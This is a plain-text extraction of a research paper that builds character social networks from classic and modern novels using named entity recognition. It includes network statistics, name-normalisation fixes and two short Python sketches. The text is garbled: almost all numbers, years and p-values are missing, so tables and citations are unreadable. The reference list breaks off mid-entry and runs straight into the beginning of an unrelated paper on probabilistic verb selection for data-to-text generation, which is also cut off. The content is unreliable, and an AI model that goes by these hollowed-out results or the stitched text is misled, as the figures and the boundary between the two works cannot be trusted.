louvain algorithm (blondel et al., ). the identification of community structures in graph is useful, because the nodes in the same community are more likely to have other properties in common (danon et al., ). it would therefore be interesting to see if differences can be observed between the prevalence of communities between the classic and modern novels. ( ) connected components are the number of distinct graph compartments. that is, a graph component is a subgraph in which any two vertices are connected to each other by paths, and which is connected to no additional vertices in the supergraph. in other words, it is not possible to traverse from one component to another. in most social communities, one ‘giant component’ can typically be identified, which contains the majority of all vertices (kumar, novak & tomkins, ). a higher number of connected components would indicate a higher number of isolated communities. this is different from modularity in the sense that components are more strict. if only a single edge goes out from a subgraph to the supergraph, it is no longer considered a separate component. modularity attempts to identify those communities that are basically ‘almost’ separate components. ( ) average clustering coefficient is the mean of all clustering coefficients. the clustering coefficient of a node can perhaps best be described as ‘all-my-neighbours-know-each-other’. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ social networks with a high clustering coefficient (and low average path length) may exhibit small world (https://en.wikipedia.org/wiki/smallworld_experiment) properties (watts & strogatz, ). the small world phenomenon was originally described by stanley milgram in his perennial work on social networks (travers & milgram, ). results of network analysis to answer our second research question, we compared the network features presented in the subsection ‘network features’ for the social networks of the two different sets of novels. table a on page shows the results. the most striking feature of these results is the wide variance across social networks on all these network measures for both the classic and the modern novels. the size of these network ranges from just nodes to networks more than times as large. the network size alone can also explain at least a large part of the differences in graph density, diameter, and average path length, but also average degree and clustering coefficient show wide variation. while we can observe large variation overall, there is no clear difference between the two classes, that is, between classic and modern novels. none of the evaluated network features differ significantly between these classes. graph density is the feature that comes closest to being significant (p = . ), with our classic novels on average exhibiting denser networks than the modern ones. in order to better interpret these values, and in order to find out whether this variance in network features is by itself a characteristic property of social networks exposed in novels, or whether this is true for social networks in general, we need a point for comparison. for that purpose, we compare our network results to metrics that have been reported for other social network in the literature. table shows such networks for comparison, including three small networks on karate club members, football players, and email users (telesford et al., ), three medium-sized networks of mathematicians, a larger group of email users, and actors (boccaletti et al., ), and four large networks of online platforms (mislove et al., ). we can see that social networks reported elsewhere exhibit a wide variation as well, showing (unsurprisingly) an even much wider range for the network size, with the reported online social networks reaching millions of nodes. our networks from novels are on the lower end of the size range, with the smallest ones being smaller than the smallest network of our comparison set (karate). this directly explains why the path lengths are also on the lower end of the range, but with a considerable overlap. with respect to the average degree, our novel networks are covered by the range given by these comparison networks, with even the outliers of our dataset being less extreme than the most extreme cases of the comparison networks. the same holds for the clustering coefficient, except for the outlier for a very small network with a clustering coefficient of (alice in wonderland). in summary, we can say that social networks from novels appear to be no different than social networks in general in showing a high variation in basically all network features across different networks. while networks differ much individually, there is no significant fundamental difference between classic and modern novels. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://en.wikipedia.org/wiki/smallworld_experiment http://dx.doi.org/ . /peerj-cs. 
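the eight measures above can be computed directly with networkx, which we already use for the network construction; the sketch below is illustrative only and assumes a recent networkx release (2.8 or later, which ships a louvain implementation), with the graph built from the weighted co-occurrence edges described earlier.

```python
import networkx as nx


def network_features(edge_weights):
    """compute the measures described above for a weighted, undirected graph.

    `edge_weights` maps (character_a, character_b) pairs to interaction counts;
    a sketch only, assuming networkx >= 2.8 for louvain community detection.
    """
    G = nx.Graph()
    for (a, b), w in edge_weights.items():
        G.add_edge(a, b, weight=w)

    n = G.number_of_nodes()
    # diameter and average path length are undefined on disconnected graphs,
    # so they are computed on the largest connected component here
    giant = G.subgraph(max(nx.connected_components(G), key=len))
    communities = nx.community.louvain_communities(G, weight="weight", seed=1)

    return {
        "average degree": sum(d for _, d in G.degree()) / n,
        "average weighted degree": sum(d for _, d in G.degree(weight="weight")) / n,
        "average path length": nx.average_shortest_path_length(giant),
        "network diameter": nx.diameter(giant),
        "graph density": nx.density(G),
        "modularity": nx.community.modularity(G, communities, weight="weight"),
        "connected components": nx.number_connected_components(G),
        "average clustering coefficient": nx.average_clustering(G),
    }
```

gephi's statistics panel reports the same measures interactively; the sketch above mainly makes the choices explicit, such as restricting the path-based measures to the largest component.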
table: comparison to other social networks (network, source, nodes, average degree, clustering coefficient, average path length).
karate telesford et al. ( ) † . . . †
football telesford et al. ( ) . . .
e-mail telesford et al. ( ) , . . .
math boccaletti et al. ( ) , . . . ⋄
e-mail boccaletti et al. ( ) , . . † .
actors boccaletti et al. ( ) , . ⋄ . ⋄ .
youtube mislove et al. ( ) , , . . .
flickr mislove et al. ( ) , , . . .
orkut mislove et al. ( ) , , . † . .
livejournal mislove et al. ( ) , , ⋄ . . .
classic novels: maximum . . . / mean . . . / minimum . . .
modern novels: maximum . . . / mean . . . / minimum . . .
notes: the highest scores in each column are highlighted with a ⋄ and the lowest scores with a † for the comparison networks.
network exploration in addition to the formal analysis above, we show here a more informal exploration of one of the networks in order to give a more intuitive explanation of our results. for that purpose, we selected the largest network of the modern novels, which is a game of thrones. a visualisation of that network is shown in fig. . we see that it is a quite dense network with many connections (it has the highest average degree of all modern novels; see table a ) and a complex structure. despite this complexity, the relationships between the main characters of this novel can easily be identified from this visualisation, and one can clearly identify social clusters. such informal visual explorations should then of course be substantiated with formal analyses, that is, by ranking the edges of the network by their weights and by applying a clustering algorithm in the case of the two given examples. as readers of this novel might have already spotted, dany resides in a completely different part of the world in this novel, which explains her distance from the rest of the network. moreover, in a game of thrones, this character does not at any point physically interact with any of the characters in the larger cluster. this highlights a caveat of the use of co-occurrence networks over conversational networks. the character dany does not truly interact with the characters of this main cluster, but is rather name-dropped in conversations between characters in that cluster. her character 'co-occurs' with the characters that drop her name, and edges are created to represent that. to stick with the example of dany, we can also identify two seemingly separate characters, dany and daenerys targaryen, in fig. . these names actually refer to the same entity. as mentioned in the section 'related work', this issue may be addressed by creating a list of aliases for each character. some online sources exist that can help expedite this process, but we would argue these sources are not applicable to our modern novels. whereas th century novels typically have characters with more traditional names such as elizabeth bennet, modern fantasy novels have unconventional names such as daenerys targaryen. external sources such as metacpan can help to connect elizabeth to nicknames such as lizzy, but there are no sources that can do this for daenerys and dany. even if there were such a source, the question remains whether it is desirable to collapse those characters. especially in a game of thrones, the mentions of dany and daenerys targaryen occur in entirely different contexts.
whereas references to dany occur in an environment that is largely friendly towards her, her formal name of daenerys targaryen is mostly used by her enemies (in her absence). rather than simply collapsing the two characters into one, it might be useful to be able to retain that distinction. this is a design choice that will depend on the type of research question one wants to answer by analysing the social networks.
figure: social network of g.r.r. martin's a game of thrones.
note: metacpan is a search engine for perl code and documentation: https://metacpan.org/source/brianl/lingua-en-nickname- . /nicknames.txt (last retrieved: october ).
discussion and performance boosting options in analysing the output of the different ner systems, we found that some types of characters were particularly difficult to recognise. firstly, we found a number of unidentified names that are so-called word names (i.e. terms that also occur in dictionaries, for example to denote nouns such as grace or rebel). we suspected that this might hinder the ner, which is why we collected all such names in our corpus in table a on page , and highlighted such word names with a †. this table shows that approximately % of all unidentified names in our entire corpus consist at least partially of a word name, which underpins that this issue is potentially widespread. in order to verify this, we replaced all potentially problematic names in the source material by generic english names. we made sure not to add names that were already assigned to other characters in the novel, and we ensured that these names were not also regular nouns. an example of these changed character names can be found in table , which shows all names affected for the black company. secondly, we noticed that persons with special characters in their names can prove difficult to retrieve. for example, names such as d'artagnan in the three musketeers or shai'tan in the wheel of time were hard to recognise for the systems. to test this, we replaced all names in our corpus such as d'artagnan or shai'tan with dartagnan and shaitan. by applying these transformations to our corpus, we found that the performances could be improved, uncovering some of the issues that plague ner. as can be observed in fig. , not all of the novels were affected by these transformations. out of the novels used in this study, we were able to improve the performance for . while the issue of the apostrophed affix was not as recurrent in our corpus as the real-word names, its impact on performance is troublesome nonetheless. clearly, two novels are more affected by these transformations than the others, namely the black company and the three musketeers. to further sketch these issues, we delve a bit deeper into these two specific novels. these name transformations show that the real-word names and names with special characters were indeed problematic and put forth a problem for future studies to tackle. as illustrated by fig. , the aforementioned issues are also present in the classic novels typically used by related works (such as the three musketeers). this begs the question of the scope of these problems. to the best of our knowledge, similar works have not identified this issue as affecting their performances, but we have shown that with a relatively simple workaround, the performance can be drastically improved. it would thus be interesting to evaluate how much these studies suffer from the same issue.
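before turning to the two case studies, a rough sketch of the two transformations described above; the apostrophe rule and the word-name mapping below are illustrative only (the mapping shows just a few of the names listed in the table that follows):

```python
import re

# word-names mapped to generic english names (illustrative subset of the table below)
WORD_NAME_MAP = {"mercy": "charles", "silent": "james", "one-eye": "timothy"}


def normalise_names(text, word_name_map=WORD_NAME_MAP):
    """apply the two workarounds: drop apostrophes inside names and replace
    word-names with generic placeholders (whole-word matches only).

    a sketch; case handling is omitted here, and the collision checks against
    existing character names described above are left out for brevity.
    """
    # d'artagnan -> dartagnan, shai'tan -> shaitan (straight or curly apostrophe)
    text = re.sub(r"(\w)['\u2019](\w)", r"\1\2", text)
    for word_name, generic in word_name_map.items():
        text = re.sub(r"\b%s\b" % re.escape(word_name), generic, text,
                      flags=re.IGNORECASE)
    return text


print(normalise_names("Mercy watched D'Artagnan draw his sword."))
# charles watched DArtagnan draw his sword.
```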
table: unidentified names in the black company replaced by generic english names (original → adjusted).
blue → richard
croaker → thomas
curly → daniel
dancing → edward
mercy → charles
one-eye → timothy
silent → james
walleye → william
lastly, as manually replacing names is clearly far from ideal, we would like to encourage future work to find a more robust approach to resolve this issue.
figure: effect of transformations on all affected classic and modern novels in f -score using the booknlp pipeline (includes co-reference resolution).
the black company this fantasy novel describes the dealings of an elite mercenary unit—the black company—and its members, all of whom go by code names such as the ones in table . with a preliminary f -score of . (see table a ), the black company did not do very well. we found this book had the highest percentage of unidentified characters of our collection. out of the characters found by our annotators, only five were identified by the pipeline. interestingly enough, eight out of the nine unidentified characters in this novel have names that correspond to regular nouns. by applying our name transformation alone, the f -score rose from . to . , the highest in our collection. the three musketeers this classic piece recounts the adventures of a young man named d'artagnan, after he leaves home to join the musketeers of the guard. with an f -score of . (see table a ), the three musketeers performs the second worst of our corpus, and the worst in its class. by simply replacing names such as d'artagnan with dartagnan, the f -score rose from . to , suggesting that the apostrophed name was indeed the main issue. to visualise this, we have included figures of both the three musketeers networks—before and after the fix—in figs. and . as can be observed in fig. , the main character of the novel is hardly represented in this network, which is not indicative of the actual story. the importance of resolving the issue of apostrophed names is made clear in fig. , where the main character is properly represented.
figure: social network of the three musketeers without adjustment for apostrophed names.
figure: social network of the three musketeers with adjustment for apostrophed names.
conclusion and future work in this study, we set out to close a gap in the literature when it comes to the evaluation of ner for the creation of social networks from fiction literature. in our exploration of related work, we found no other studies that attempt to compare networks from classic and modern fiction. to fill this gap, we attempted to answer the following two research questions: (1) to what extent are off-the-shelf ner tools suitable for identifying fictional characters in novels? (2) which differences or similarities can be discovered between social networks extracted for different novels? to answer our primary research question, we evaluated four state-of-the-art ner systems on classic and modern science fiction/fantasy novels. in our study, we found no significant difference in performance of the named entity recognisers on classic novels and modern novels. we did find that novels written in rd person perspective perform significantly better than those written in st person, which is in line with findings in related studies. in addition, we observed a large amount of variance within each class, even despite our limitation of the modern novels to the fantasy/science fiction genre. we also identified some recurring problems that hindered ner. we delved deeper into two such problematic novels, and found two main issues that overarch both classes. firstly, we found that word names such as mercy are more difficult for the systems to identify. we showed that replacing problematic word names by generic placeholders can increase performance on affected novels. secondly, we found that apostrophed names such as d'artagnan also prove difficult to automatically identify. with fairly simple methods that capture some cultural background knowledge, we circumvented the above two issues to drastically increase the performance of the used pipeline.
to the best of our knowledge, none of the related studies discussed in the section ‘related work’ acknowledge the presence of these issues. we would thus like to encourage future work to evaluate the impact of these two issues on existing studies, and call to develop a more robust approach to tackle them in future studies. to answer our secondary research question, we created social networks for each of the novels in our collection and calculated several networks features with which we compared the two classes. as with the ner experiments, no major differences were found between the classic and modern novels. again, we found that the distribution of network measures within a class was subject to high variance, which holds for our collection of both classic and modern novels. we therefore recommend that future work focuses on determining particular characteristics that can influence these analyses first and then perform a comparative analysis between subsets to see if this similarity between classes holds when the variance is reduced. future studies could therefore attempt to compare classic and modern novels in the same genre or narration type (e.g. first-person vs third-person perspective). lastly, different types of networks that for example collapse characters that occur under different names (cf. dany and daenerys) as well as dealing with plural pronouns and group membership (e.g. characters sometimes mentioned dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ individually and sometimes as part of a group) are currently unsolved problems for language technology and knowledge representation. these issues point to a strong need for more culturally-aware artificial intelligence. appendix: additional statistics table a characters that were not identified by the system, supplied by the annotators. classic modern ada howard mrs. billington archmage of ymitury† manie algy joanna mrs. birch† august† meena alice johnny mrs. crisp† bil baker† mercy† anna boleyne jolly miller† mrs. effington stubbs blue† mrs. potter† aprahamian leonard mrs. thingummy brine cutter† old cob† belisarius lord mayor† murray bug† one-eye† best-ingram lory† nathan swain† chyurda pappa doc† cain major dover† peter teazle† cotillion† patience† caroline marie antoinette policar morrel† croaker† plowman† catherine marshal bertrand† president west† curly† poul cato matilda carbury queequeg dadda rand† cervantes matron† rip van winkle† dancing† shalash christine miss birch† royce domi shrewd† chuck loyola† miss crump† sawbones† dow† silent† cleopatra miss hopkins† semiramis elam dowtry sirius† connolly norman† miss king† shep elao talenel curly† miss saltire† sir carbury fredor talenelat dante miss swindle† skrimshander† gart ted dave mme. d’artagnan stamford harold the empress† dives† mollie stigand harvey themos tresting dodo† mouse† sudeley howard theron dr. floss† mr. stroll† swubble ien threetrees duck† mr. thursgood the director† ilgrand lender† toffston edgar atheling† mr. beaufort† tommy barnes ishar verus elmo mr. crisp† unwin ishi walleye† farmer mitchell† mr. flowerdew ursula jim mcguffin† weasel† father joseph† mr. lawrence victor† kerible the enchanter† willum fury† mr. morris vilkins lilly† wit congar† ginny mrs loveday von bischoff henry viii mrs. bates† ysabel out of characters: % out of characters: % note: characters whose names (partly) consist of a real word—such as ‘curly’ or ‘mercy’—are marked with a †. 
checked against http://dictionary.com. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dictionary.com http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a classic and modern novels included in this study. classic title author (year) e-book no./isbn george orwell ( ) a study in scarlet conan doyle ( ) alice in wonderland lewis carroll ( ) brave new world aldous huxley ( ) david copperfield charles dickins ( ) dracula bram stoker ( ) emma jane austen ( ) frankenstein mary shelley ( ) huckleberry finn mark twain ( ) jekyll and hyde robert stevenson ( ) moby dick herman melville ( ) oliver twist charles dickins ( ) pride and prejudice jane austen ( ) the call of the wild jack london ( ) the count of monte cristo alexandre dumas ( ) the fellowship of the ring j. r. r. tolkien ( ) the three musketeers alexandre dumas ( ) the way we live now anthony trollope ( ) ulysses james joyce ( ) vanity fair william thackeray ( ) modern a game of thrones g.r.r. martin ( ) assassin’s apprentice robin hobb ( ) elantris brandon sanderson ( ) gardens of the moon steven erikson ( ) harry potter j.k. rowling ( ) magician raymond feist ( ) mistborn brandon sanderson ( ) prince of thorns mark lawrence ( ) storm front jim butcher ( ) the black company glen cook ( ) the black prism brent weeks ( ) the blade itself joe abercrombie ( ) the colour of magic terry pratchett ( ) the gunslinger steven king ( ) the lies of locke lamora scott lynch ( ) the name of the wind patrick rothfuss ( ) the painted man peter brett ( ) the way of kings brandon sanderson ( ) the wheel of time robert jordan ( ) way of shadows brent weeks ( ) note: the short e-book numbers are the catalog entry of novels obtained from gutenberg. novels obtained through online purchase are denoted by the longer isbns. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a overall statistics for classic and modern novels in our corpus. classic title fraction of defaults fraction of unidentified characters average sentence length average persons per sentence fraction of sentences with a person annotated sentences unique characters total character mentions . . † . . . , a study in scarlet . . . . . alice in wonderland . . ⋄ . . . brave new world . . . . . , david copperfield . . † . . . , dracula . ⋄ . † . . † . † , emma . . . . . , frankenstein . . . . . huckleberry finn . . . . . , jekyll and hyde . . . . . † † † moby dick . . . . . , oliver twist . . . . . , pride and prejudice . . . . . , the call of the wild . . . . . the count of monte cristo . . . . . , the lord of the rings . . . . . ⋄ , the three musketeers . . . . . , the way we live now . . . . . , ⋄ ulysses . . . † . . ⋄ , vanity fair . † . . ⋄ . ⋄ . ⋄ , mean m . . . . . . . , . standard deviation s . . . . . . . , . modern a game of thrones . . † . . . ⋄ ⋄ , ⋄ assassin’s apprentice . . . . . , elantris . . . . . † † gardens of the moon . . . . † . , harry potter . . . . . , magician . . . . . , mistborn . . . . . , prince of thorns . . † . . . , storm front . . † . . . , the black company . . ⋄ . † . . , the black prism . . . . . , the blade itself . . . . . , the colour of magic . . . . . , the gunslinger . ⋄ . . . . † , the lies of locke lamora . † . . ⋄ . ⋄ . , (continued) dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a (continued). 
classic title fraction of defaults fraction of unidentified characters average sentence length average persons per sentence fraction of sentences with a person annotated sentences unique characters total character mentions the name of the wind . . . . . , the painted man . . . . . , the way of kings . . . . . , the wheel of time . . . . . ⋄ , way of shadows . . . . . † , mean m . . . . . . . , . standard deviation s . . . . . . . , . mclassic - mmodern . . . . . . . - , . pooled s . . . . . , p-value . . > . . . . . . significant no no yes no no no no no note: the highest scores in each column are highlighted with a ⋄, and the lowest scores with a †. the highest and lowest performing books for each class, in terms of f -score found in tables a and a , are marked with a grey fill. boldface indicate the highest and lowest scores in each column. table a results of the complete booknlp pipeline: named entity recognition (stanford ner), character name clustering (e.g. ‘tom’, ‘tom sawyer’, ‘mr. sawyer’, ‘thomas sawyer’ / tom_sawyer) and pronominal coreference resolution. classic modern title precision recall f -score title precision recall f -score . . . a game of thrones . . . a study in scarlet⊙ . . . assassin’s apprentice⊙ . . . alice in wonderland . . . elantris . . . brave new world . . . gardens of the moon . . . david copperfield⊙ . . . harry potter . ⋄ . ⋄ . ⋄ dracula⊙ . . . magician . . . emma . ⋄ . ⋄ . ⋄ mistborn . . . frankenstein⊙ . . . prince of thorns . . . huckleberry finn . . . storm front⊙ . . . jekyll and hyde . . . the black company⊙ . † . † . † moby dick⊙ . . . the black prism . . . oliver twist . . . the blade itself . . . pride and prejudice . . . the colour of magic . . . the call of the wild . . . the gunslinger . . . the count of monte cristo . . . the lies of locke lamora . . . the fellowship of the ring . . . the name of the wind . . . the three musketeers . † . † . † the painted man . . . the way we live now . . . the way of kings . . . ulysses . . . the wheel of time . . . vanity fair . . . way of shadows . . . dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a (continued). classic modern title precision recall f -score title precision recall f -score mean m . . . mean m . . . standard deviation s . . . standard deviation s . . . note: the highest scores in each column are highlighted with a ⋄, and the lowest scores with a †. novels written in st person are marked with a ⊙. boldface indicate the highest and lowest scores in each column. table a social network measures for classic and modern novels. classic title nodes edges average degree average weighted degree network diameter graph density modularity connected components average clustering coefficient average path length . . . . . . a study in scarlet . . . . . . alice in wonderland † . † . † . . † . brave new world . . . . . . david copperfield . . . . . . dracula . . . . † . . emma . . ⋄ . . . . frankenstein . . . . . . huckleberry finn . . . . ⋄ . . jekyll and hyde † . . † . ⋄ . . ⋄ . † moby dick . . . . . . ⋄ oliver twist . . . . . . pride and prejudice . . . . . . the call of the wild . . . . . . the count of monte cristo . . . . . . the fellowship of the ring . . . . . . the three musketeers . . . . . . the way we live now . . . . . . ulysses ⋄ , ⋄ . ⋄ . ⋄ . . ⋄ . . vanity fair , . . . † . . . mean m . . . . . . . standard deviation s . . . . . . . . . . modern a game of thrones ⋄ , ⋄ . ⋄ . . . . . assassin’s apprentice . . . 
. . . elantris . . ⋄ . . . . † gardens of the moon . . . . . . harry potter . . . . . . magician . . . . . . (continued) dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � niels dekker conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � tobias kuhn contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. table a (continued). classic title nodes edges average degree average weighted degree network diameter graph density modularity connected components average clustering coefficient average path length mistborn . . . . † . . prince of thorns . . . . . † . storm front . . † . ⋄ . . . the black company . † . † . . . . the black prism . . . . . ⋄ . the blade itself . . . . . . the colour of magic † † . . . . . . the gunslinger . . . . . . the lies of locke lamora . . . . . . the name of the wind . . ⋄ . . ⋄ . . ⋄ the painted man . . . . . . the way of kings . . . † . ⋄ . . the wheel of time . . . . . . way of shadows . . . . . . mean m . . . . . . . standard deviation s . . . . . . . . . . mclassic - mmodern . - . . - . . . - . pooled s . . . . . . . . p-value . . . . . . . . . . significant no no no no no no no no no no note: the highest scores in each column are highlighted with a ⋄, and the lowest scores with a †. the highest and lowest performinag books for each class, in terms of f -score found in tables and , are marked with a grey fill. boldface indicate the highest and lowest scores in each column. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � marieke van erp conceived and designed the experiments, contributed reagents/ materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: code and data are available at github: https://github.com/niels-dekker/out-with-the- old-and-in-with-the-novel. references agarwal a, corvalan a, jensen j, rambow o. . social network analysis of alice in wonderland. in: proceedings of the naacl-hlt workshop on computational linguistics for literature. uppsala: association for computational linguistics, – . agarwal a, kotalwar a, rambow o. . automatic extraction of social networks from literary text: a case study on alice in wonderland. in: sixth international joint conference on natural language processing (ijnlp ). nagoya: asian federation for natural language processing, – . agerri r, rigau g. . robust multilingual named entity recognition with shallow semi- supervised features. artificial intelligence : – doi . /j.artint. . . . akimushkin c, amancio dr, oliveira on jr. . text authorship identified using the dynamics of word co-occurrence networks. plos one ( )e doi . /journal.pone. . amancio dr. . probing the topological properties of complex networks modeling short written texts. plos one ( )e doi . /journal.pone. . ardanuy mc, sporleder c. . structure-based clustering of novels. 
in: proceedings of the eacl workshop on computational linguistics for literature. gothenburg: sweden association for computational linguistics, – . bamman d, underwood t, smith na. . a bayesian mixed effects model of literary character. in: proceedings of the nd annual meeting of the association for computational linguistics (acl ). baltimore: association for computational linguistics, – . biber d, finegan e. . drift and the evolution of english style: a history of three genres. language ( ): – doi . / . blondel vd, guillaume j-l, lambiotte r, lefebvre e. . fast unfolding of communities in large networks. journal of statistical mechanics: theory and experiment ( ):p doi . / - / / /p . boccaletti s, latora v, moreno y, chavez m, hwang d-u. . complex networks: structure and dynamics. physics reports ( – ): – . bringhurst r. . the elements of typographic style. british columbia: hartley & marks vancouver. chambers n, jurafsky d. . unsupervised learning of narrative event chains. in: proceedings of the th annual meeting of the association for computational linguistics (acl ), vol. . columbus: association for computational linguistics, – . danon l, diaz-guilera a, duch j, arenas a. . comparing community structure identification. journal of statistical mechanics: theory and experiment ( ):p doi . / - / / /p . dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/niels-dekker/out-with-the-old-and-in-with-the-novel https://github.com/niels-dekker/out-with-the-old-and-in-with-the-novel http://dx.doi.org/ . /j.artint. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / http://dx.doi.org/ . / - / / /p http://dx.doi.org/ . / - / / /p http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ de does j, depuydt k, van dalen-oskam k, marx m. . namescape: named entity recognition from a literary perspective. in: odijk j, van hessen a, eds. clarin in the low countries. london: ubiquity press, – . dijkstra ew. . a note on two problems in connexion with graphs. numerische mathematik ( ): – doi . /bf . elson dk, dames n, mckeown kr. . extracting social networks from literary fiction. in: proceedings of the th annual meeting of the association for computational linguistics, uppsala: association for computational linguistics, – . elson dk, mckeown k. . automatic attribution of quoted speech in literary narrative. in: proceedings of the th aaai conference on artificial intelligence (aaai- ). atlanta: association for the advancement of artificial intelligence. fernandez m, peterson m, ulmer b. . extracting social network from literature to predict antagonist and protagonist. technical report. stanford: stanford university. available at https://nlp.stanford.edu/courses/cs n/ /reports/ .pdf. finkel jr, grenager t, manning c. . incorporating non-local information into information extraction systems by gibbs sampling. in: proceedings of the rd annual meeting on association for computational linguistics. ann arbor: association for computational linguistics, – . he h, barbosa d, kondrak g. . identification of speakers in novels. in: proceedings of the st annual meeting of the association for computational linguistics (acl ), sofia: association for computational linguistics, – . kumar r, novak j, tomkins a. . structure and evolution of online social networks. in: philip sy, jiawei h, christos f, eds. link mining: models, algorithms, and applications. new york: springer-verlag, – . lee j, yeung cy. . 
probabilistic verb selection for data-to-text generation

dell zhang†, jiahao yuan‡, xiaoling wang‡, and adam foster†
†birkbeck, university of london, malet street, london wc e hx, uk
‡shanghai key lab of trustworthy computing, east china normal university, north zhongshan road, shanghai , china
dell.z@ieee.org, xlwang@sei.ecnu.edu.cn

abstract

in data-to-text natural language generation (nlg) systems, computers need to find the right words to describe phenomena seen in the data. this paper focuses on the problem of choosing appropriate verbs to express the direction and magnitude of a percentage change (e.g., in stock prices). rather than simply using the same verbs again and again, we present a principled data-driven approach to this problem based on shannon's noisy-channel model so as to bring variation and naturalness into the generated text. our experiments on three large-scale real-world news corpora demonstrate that the proposed probabilistic model can be learned to accurately imitate human authors' pattern of usage around verbs, outperforming the state-of-the-art method significantly.

introduction

natural language generation (nlg) is a fundamental task in artificial intelligence (ai) (russell and norvig, ). it aims to automatically turn structured data into prose (reiter, ; belz and kow, ), the opposite of the better-known field of natural language processing (nlp) that transforms raw text into structured data (e.g., a logical form or a knowledge base) (jurafsky and martin, ). being dubbed "algorithmic authors" or "robot journalists", nlg systems have attracted a lot of attention in recent years, thanks to the rise of big data (wright, ). the use of nlg in financial services has been growing very fast. one particularly important nlg problem for summarizing financial or business data is to automatically generate textual descriptions of trends between two data points (such as stock prices). in this paper, we elect to use relative percentages rather than absolute numbers to describe the change from one data point to another. this is because an absolute number might be considered small in one case but large in another, depending on the unit and the context (krifka, ; smiley et al., ). for example, british pounds are worth much more than japanese yen; a rise of us dollars in car price might be negligible but the same amount of increase in bike price would be significant. given two data points (e.g., on a stock chart), the percentage change can always be calculated easily. the challenge is to select the appropriate verb for any percentage change. for example, in newspapers, we often see headlines like "apple's stock had jumped % this year in anticipation of the next iphone . . . " and "microsoft's profit climbed % with shift to web-based software . . . ". the journalists writing such news stories use descriptive language, such as verbs like jump and climb, to express the direction and magnitude of a percentage change. it is of course possible to simply keep using the same neutral verbs, e.g., increase and decrease for upward and downward changes respectively, again and again, as in most existing data-to-text nlg systems. however, the generated text would sound much more natural if computers could use a variety of verbs suitable in the context, like human authors do. expressions of percentage changes are readily available in many natural language text datasets and
can be easily extracted. therefore computers should be able to learn from such expressions how people decide which verbs to use for what kind of percentage changes. in this paper, we address the problem of verb selection for data-to-text nlg through a principled data-driven approach. specifically, we show how to employ bayesian reasoning to train a probabilistic model for verb selection based on large-scale real-world news corpora, and demonstrate its advantages over existing verb selection methods. the rest of this paper is organized as follows. in section , we review the related work in the literature. in section , we describe the datasets used for our investigation. in section , we present our probabilistic model for verb selection in detail. in section , we conduct experimental evaluation. in section , we discuss possible extensions to the proposed approach. in section , we draw conclusions.

related work

the most successful nlg applications, from the commercial perspective, have been data-to-text nlg systems which generate textual descriptions of databases or datasets (reiter, ; belz and kow, ). a typical example is the automatic generation of textual weather forecasts from weather data, which has been used by environment canada and the uk met office (goldberg et al., ; belz, ; sripada et al., ). the trend system (boyd, ) focuses on generating descriptions of historical weather patterns. their method concentrates primarily on the detection of upward and downward trends in the weather data, and uses a limited set of verbs to describe different types of movements. ramos-soto et al. ( ) also address the surface realization of weather trend data by creating an "intermediate language" for temperature, wind etc. and then using four different ways to verbalize temperatures based on the minimum, maximum and trend in the time frame considered. an empirical corpus-based study of human-written weather forecasts has been conducted in sumtime-mousam (reiter et al., ), and one aspect of their research focused on verb selection in weather forecasts. they built a classifier to predict the choice of verb based on type (speed vs. direction), information content (change or transition from one wind state to another) and near-synonym choice. there is more and more interest in using nlg to enhance accessibility, for example by describing data in the form of graphs etc. to visually impaired people. in such nlg systems, there has also been exploration into the generation of text for trend data which should be automatically adapted to users' reading levels (moraes et al., ). there exists widespread usage of nlg systems on financial and business data. for example, the spotlight system developed at a.c. nielsen automatically generated readable english text based on the analysis of large amounts of retail sales data. for another example, in forbes reported that factset used nlg to automatically write hundreds of thousands of company descriptions a day. it is not difficult to imagine that different kinds of such data-to-text nlg systems can be utilized by a modern chatbot like amazon echo or microsoft xiaoice (shum et al., ) to enable users to access a variety of online data resources via natural language conversation.
typically, a complete data-to-text nlg system im- plements a pipeline which involves both content se- lection (“what to say”) and surface realization (“how to say”). in recent years, researchers have made much progress in the end-to-end joint optimization of those two aspects: angeli et al. ( ) treat the generation process as a sequence of local decisions represented by log-linear models; konstas and lapata ( ) employ a probabilistic context-free grammar (pcfg) specifying the structure of the event records and complement it with an n-gram language model as well as a dependency model; the most advanced method to date is the lstm recurrent neural net- work (rnn) based encoder-aligner-decoder model proposed by mei et al. ( ) which is able to learn content selection and surface realization together di- rectly from database-text pairs. the verb selection problem that we focus on in this paper belongs to the lexicalization step of content selection, more specifi- cally, sentence planning. similar to the above men- tioned joint optimization methods, our approach to verb selection is also automatic, unsupervised, and domain-independent. it would be straightforward to generalize our proposed model to select other types of words (like adjectives and adverbs), or even textual templates as used by angeli et al. ( ), to describe numerical data. due to its probabilistic nature, our proposed model could be plugged into, or interpo- lated with, a bigger end-to-end probabilistic model (konstas and lapata, ) relatively easily, but it is not obvious how this model could fit into a neural architecture (mei et al., ). the existing work on lexicalization that is most similar to ours is a corpus based method for verb se- lection developed by smiley et al. ( ) at thomson reuters. they analyze the usage patterns of verbs expressing percentage changes in a very large corpus, the reuters news archive. for each verb, they 